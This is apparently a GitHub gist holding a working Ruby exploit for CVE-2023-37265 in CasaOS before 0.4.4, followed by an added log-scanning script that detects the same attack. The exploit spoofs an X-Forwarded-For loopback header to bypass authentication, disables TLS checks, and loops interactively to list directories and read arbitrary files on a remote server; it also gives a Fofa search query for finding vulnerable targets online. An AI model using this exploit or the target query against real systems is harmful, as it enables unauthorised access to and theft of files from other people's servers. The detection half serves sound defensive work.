@komodoooo
Created August 13, 2023 13:16
CVE-2023-37265 exploit via XFF bypass
```ruby
require 'http'
require 'openssl'
require 'json'

puts """
CVE-2023-37265
CasaOS <0.4.4 Path traversal Exploit
By komodo
"""

=begin
Fofa query to search vulnerable targets:
body="/CasaOS-UI/public/index.html"
=end

def main(url, path)
  # Drop a single trailing slash so the request paths below are well formed.
  url = url.delete_suffix("/")
  # TLS certificate verification is disabled for the requests.
  @ctx = OpenSSL::SSL::SSLContext.new()
  @ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
  # The XFF bypass from the title: the request claims a loopback client address.
  headerz = {"X-Forwarded-For"=>"127.0.0.1"}
  # Directory listing request.
  r = HTTP.get("#{url}/v1/folder?path=#{path}",
               :headers=>headerz, :ssl_context=>@ctx)
  # File content request for the same path.
  r2 = HTTP.get("#{url}/v1/file?path=#{path}",
                :headers=>headerz, :ssl_context=>@ctx).body
  d = JSON.load(r.body)['data']['content']
  if r.code==200 and r.body.to_s[0]=="{"
    # The path is a directory: print each entry.
    puts "\n"
    d.size.times do |i|
      puts d[i]['path']
    end
  elsif r.code==500 and r.body.to_s.include?("not a directory")
    # The path is a file: print its content.
    puts r2
  else
    raise
  end
end

begin
  print "\nBase URL: "
  t = gets.chomp
  while true
    print "\nPath> "; p = gets.chomp
    main(t, p.empty? ? "/" : p)
  end
rescue => e
  # Any error (unexpected status, non-JSON body, connection failure) ends the session.
  puts "\nNot vulnerable!"
  abort(e.to_s)
end
```
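For detection, the requests the script sends have a recognisable shape: a remote peer hitting `/v1/folder` or `/v1/file` while `X-Forwarded-For` claims a loopback address. The following is an added example, not part of the original gist or of CasaOS; it assumes a front-end proxy writes JSON-lines logs with hypothetical fields `peer` (TCP source address), `xff` (raw header value) and `uri`, and the sample lines are constructed.

```ruby
require 'json'
require 'ipaddr'

# Endpoints requested by the script on this page.
WATCHED  = %w[/v1/folder /v1/file].freeze
LOOPBACK = [IPAddr.new('127.0.0.0/8'), IPAddr.new('::1/128')].freeze

# True when addr parses as an IPv4/IPv6 loopback address
# (including IPv4-mapped IPv6 such as ::ffff:127.0.0.1).
def loopback?(addr)
  ip = IPAddr.new(addr.to_s.strip)
  ip = ip.native if ip.ipv4_mapped?
  LOOPBACK.any? { |net| net.include?(ip) }
rescue IPAddr::Error
  false
end

# A log entry is suspicious when a non-loopback peer reaches a watched
# endpoint and any X-Forwarded-For hop claims to be loopback.
def suspicious?(entry)
  path = entry['uri'].to_s.split('?', 2).first
  return false unless WATCHED.include?(path)
  return false if loopback?(entry['peer'])
  entry['xff'].to_s.split(',').any? { |hop| loopback?(hop) }
end

# Returns the parsed entries that match; malformed lines are skipped.
def scan(lines)
  lines.filter_map do |line|
    entry = begin
      JSON.parse(line)
    rescue JSON::ParserError
      nil
    end
    entry if entry.is_a?(Hash) && suspicious?(entry)
  end
end

# Constructed sample log lines (field names are assumptions).
SAMPLE = <<~LOG.lines
  {"peer":"203.0.113.7","xff":"127.0.0.1","uri":"/v1/folder?path=/"}
  {"peer":"203.0.113.7","xff":"127.0.0.1","uri":"/v1/file?path=/etc/hostname"}
  {"peer":"127.0.0.1","xff":"","uri":"/v1/folder?path=/DATA"}
  {"peer":"198.51.100.20","xff":"198.51.100.9","uri":"/v1/folder?path=/DATA"}
  {"peer":"198.51.100.20","xff":"10.0.0.5, ::1","uri":"/v1/file?path=/DATA/a.txt"}
  {"peer":"203.0.113.7","xff":"127.0.0.1","uri":"/index.html"}
LOG

scan(SAMPLE).each { |e| puts "ALERT #{e['peer']} xff=#{e['xff']} #{e['uri']}" } if __FILE__ == $0
```

The check only works if the log records the real TCP peer rather than a client address already derived from the header.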